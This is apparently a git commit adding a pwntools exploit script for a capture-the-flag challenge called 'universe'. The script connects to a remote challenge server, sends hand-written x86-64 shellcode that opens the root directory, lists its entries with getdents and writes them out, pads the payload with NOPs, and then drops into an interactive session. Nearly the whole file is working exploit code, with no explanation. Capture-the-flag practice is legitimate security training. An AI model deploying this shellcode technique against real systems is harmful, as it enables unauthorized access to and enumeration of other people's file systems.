get files in directory

2024-10-22 13:50:23 +03:00
parent cd8529387d
commit bc5d06f6c0
1 changed files with 34 additions and 0 deletions
@@ -0,0 +1,34 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./universe", checksec=False)
+# r = process()
+r = remote("challenge.bugpwn.com", 1004)
+
+# openat + getdents + write
+shellcode="""
+mov r9, [rsp]
+sub r9, 0x1370
+add r9, 0x4500
+mov r15, 0x2f
+push r15
+lea rsi, [rsp]
+xor rdx, rdx
+xor r10, r10
+add ax, 257
+syscall
+mov edi, eax
+mov al, 78
+mov rsi, r9
+mov dx, 1000
+syscall
+mov edi, 1
+mov eax, 1
+syscall
+"""
+shellcode = asm(shellcode)
+shellcode += b"\x90"*(4096-len(shellcode))
+r.sendline(shellcode)
+
+r.interactive()